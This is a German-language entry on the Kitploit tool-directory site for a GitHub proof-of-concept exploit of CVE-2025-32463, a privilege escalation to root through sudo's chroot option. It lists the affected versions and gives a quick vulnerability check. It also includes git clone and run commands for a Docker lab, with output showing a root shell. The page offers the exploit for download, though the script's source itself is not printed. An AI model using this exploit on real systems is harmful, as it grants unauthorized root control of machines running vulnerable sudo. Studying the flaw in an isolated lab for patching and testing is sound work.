Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsRed TeamingContainer-Ausbruch
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

Privilegienerweiterung auf root über die sudo-Binärdatei mit der chroot-Option. CVE-2025-32463

Repository anzeigen
52595vor 9 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32463 – sudo chroot ("chwoot") PoC

Dieses Repository bietet eine minimale, reproduzierbare Umgebung, um die CVE‑2025‑32463-Privilege-Escalation-Schwachstelle in der chroot-Funktion von sudo zu demonstrieren.

  • Diese Schwachstelle wurde von Rich Mirch (@0xm1rch auf X) @ Stratascale gemeldet.
  • Originalbeitrag: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

Betroffene Versionen

Betroffen sind verwundbare Builds von sudo 1.9.14 bis 1.9.17 (alle p‑Revisionen) auf den meisten Linux-Distributionen.

Sicherheitsseiten

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Inhalt

DateiZweck
DockerfileErstellt ein Ubuntu-24.04-Image mit verwundbarem sudo 1.9.16p2 und Build-Tools
sudo‑chwoot.shProof-of-Concept-Exploit, der eine Root-Shell innerhalb des chroot startet
run.sh

Schneller Schwachstellen-Check

root@kitploit:~
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Exploit im Docker-Container testen

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh übergibt --privileged und --rm an Docker, sodass sich der Container beim Beenden selbst aufräumt.


Aufräumen

Entferne das Image, wenn du fertig bist:

root@kitploit:~
docker rmi sudo-chwoot

Referenz

  • Sicherheitshinweis von Stratascale CRU: Vulnerability Advisory: Sudo chroot Elevation of Privilege
Tool herunterladen
Hilfsskript, das das Image (falls nötig) erstellt und den Exploit-Container startet